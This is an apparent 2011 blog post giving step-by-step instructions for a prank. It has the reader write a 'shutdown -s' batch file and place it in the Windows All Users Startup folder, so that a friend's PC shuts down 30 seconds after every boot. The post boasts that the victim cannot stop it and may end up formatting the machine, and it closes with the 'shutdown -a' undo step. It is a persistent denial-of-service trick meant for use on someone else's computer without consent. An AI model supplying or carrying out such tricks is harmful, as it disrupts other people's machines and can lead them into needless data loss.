
Monday, January 17, 2011

CMD Command Prompt Trick

Now you can make your friend irritate or make him/her to format PC 

1.Open Notepad and write this command

shutdown -s
then save it to on Desktop as name (shut.bat) it will look some thing like this

2.Copy that File to C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Paste it in Startup folder

3.Then just give the PC Restart Whenever the user start his PC on the Welcome Screen he will see this Box

it means that PC will be shutdown in (30 Second) lolz 

let him do whatever he want he can't stop it coz many of person don't know about the Startup folder lolz

Now How to stop that process ?

4. Start=>Run=>Type (shutdown -a) and the 30 Second Count Process will Stop

then just go back in Startup folder and Delete that Batch File .
C:\Documents and Settings\All Users\Start Menu\Programs\Startup


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